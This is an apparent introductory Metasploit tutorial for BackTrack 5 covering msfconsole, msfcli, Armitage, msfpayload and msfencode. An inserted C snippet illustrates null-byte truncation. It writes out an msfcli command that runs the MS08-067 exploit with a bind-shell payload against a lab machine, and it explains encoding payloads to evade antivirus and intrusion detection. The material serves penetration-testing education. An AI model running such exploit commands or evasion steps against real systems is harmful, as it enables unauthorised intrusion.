Metasploit Terms
Exploit – to take advantage of a security flaw within a system, network, or application.
Payload – the code that the Metasploit framework delivers to the victim computer for execution.
Module – a small piece of code that can be added to the Metasploit framework to execute an attack.
Shellcode – a small piece of code used as a payload.
MSFconsole
Msfconsole is an all-in-one interface to most of the features in Metasploit. Msfconsole can be used to launch attacks, create listeners, and much, much more. We will be using Msfconsole throughout these tutorials; mastering it will allow you to keep up with Metasploit's rapidly changing framework. Metasploit comes installed by default on BackTrack 5. To access msfconsole, open your console and type:
root@bt: ~# cd /opt/framework3/msf3/
root@bt:/opt/framework3/msf3# msfconsole
After some time, the msfconsole will boot.
To view the help files, simply type help followed by the command you want to know more about. In our case, we want to learn about the connect command. The connect command allows us to communicate with a host.
msf > help connect
MSFcli
Msfcli is another way to access the Metasploit framework, but it focuses more on scripting and interoperability with other console-based tools. To view the msfcli help, type:
root@bt:~# cd /opt/framework3/msf3
root@bt:~# msfcli -h
Now we are going to do a little test run of msfcli. It's important to note that whenever you're learning Metasploit and you get stuck, you can see the options in a module by adding the letter O to the end of the line. For example:
root@bt:~# msfcli windows/smb/ms08_067_netapi O
This module requires three options: RHOST, RPORT, and SMBPIPE. Adding P to the end allows us to see what payloads we can use.
root@bt:~# msfcli windows/smb/ms08_067_netapi RHOST=192.168.56.101 P
We can run our exploit by selecting a payload, filling out the options, and running it by passing the letter E at the end of the msfcli argument string.
root@bt:~# msfcli windows/smb/ms08_067_netapi RHOST=192.168.56.101 PAYLOAD=windows/shell/bind_tcp E
Note: the IP address assigned to RHOST is a Windows XP machine that I have on a virtual machine. It will act as our victim machine for testing. You will have to do the same with another computer or a virtual machine. For practice, do not update your victim machine or install anti-virus. We want to be able to use our exploits without them being patched over with Windows updates. We will go over this more in-depth later on.
The Armitage component is a fully interactive graphical user interface.
Running Armitage
- Run the command armitage.
- Select Start MSF.
MSFpayload
The msfpayload component of Metasploit generates shellcode and executables. Shellcode can be generated in many formats including C, Ruby, JavaScript and even Visual Basic. Each output will be useful in various situations.
For msfpayload help type: root@bt:~# msfpayload -h
Just like msfcli, if you need to find out the required options, append the letter O on the command line.
root@bt:~# msfpayload windows/shell_reverse_tcp O
MSFencode
The shellcode generated by msfpayload is functional, but it contains several null characters that, when interpreted by many programs, signify the end of a string; this will cause the code to terminate before completion.
In addition, shellcode traversing a network in cleartext is likely to be picked up by intrusion detection systems (IDSs) and antivirus software. To address this problem, Metasploit's developers offer msfencode, which helps you avoid bad characters and evade antivirus and IDSs by encoding the original payload in a way that does not include "bad" characters.
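Why an embedded null byte cuts a buffer short once it passes through string-handling code, as an added C example that is not part of the original tutorial. The byte buffer is constructed for illustration (it is not shellcode), and the helper names are my own:

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Constructed sample buffer (not shellcode): 8 bytes with an embedded 0x00 at offset 4. */
static const unsigned char sample[] = { 0x41, 0x42, 0x43, 0x44, 0x00, 0x45, 0x46, 0x47 };
static const size_t sample_len = sizeof(sample);

/* Count how many times a "bad" byte value occurs in a buffer
 * (the same check an encoder performs before deciding the payload is safe). */
size_t count_bad_bytes(const unsigned char *buf, size_t len, unsigned char bad) {
    size_t n = 0;
    for (size_t i = 0; i < len; i++)
        if (buf[i] == bad) n++;
    return n;
}

/* Simulate a program that treats the buffer as a C string: strcpy() stops at the
 * first NUL, so everything after it is silently dropped. Returns bytes that survived. */
size_t bytes_copied_by_strcpy(const unsigned char *buf, size_t len) {
    char src[64] = {0};
    char dst[64] = {0};
    if (len >= sizeof(src)) len = sizeof(src) - 1;   /* keep the copy in bounds */
    memcpy(src, buf, len);                           /* memcpy copies all bytes, NUL included */
    strcpy(dst, src);                                /* strcpy truncates at the embedded NUL */
    return strlen(dst);
}

int main(void) {
    printf("null bytes in sample: %zu\n", count_bad_bytes(sample, sample_len, 0x00));
    printf("bytes surviving strcpy: %zu of %zu\n",
           bytes_copied_by_strcpy(sample, sample_len), sample_len);
    return 0;
}
```

Only the first four bytes survive the string copy, which is exactly why a payload containing 0x00 fails in any program that handles it as a string.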
Enter msfencode -h to see a list of msfencode options.
Metasploit contains a number of different encoders for different situations. Some will be useful when you can use only alphanumeric characters as part of a payload, as is the case with many file format exploits or other applications that accept only printable characters as input, while others are great general purpose encoders that do well in every situation. A very popular and well-known encoder is x86/shikata_ga_nai.
To see the list of encoders available, append -l to msfencode as shown next. The encoders are ranked in order of reliability.
root@bt:~# msfencode -l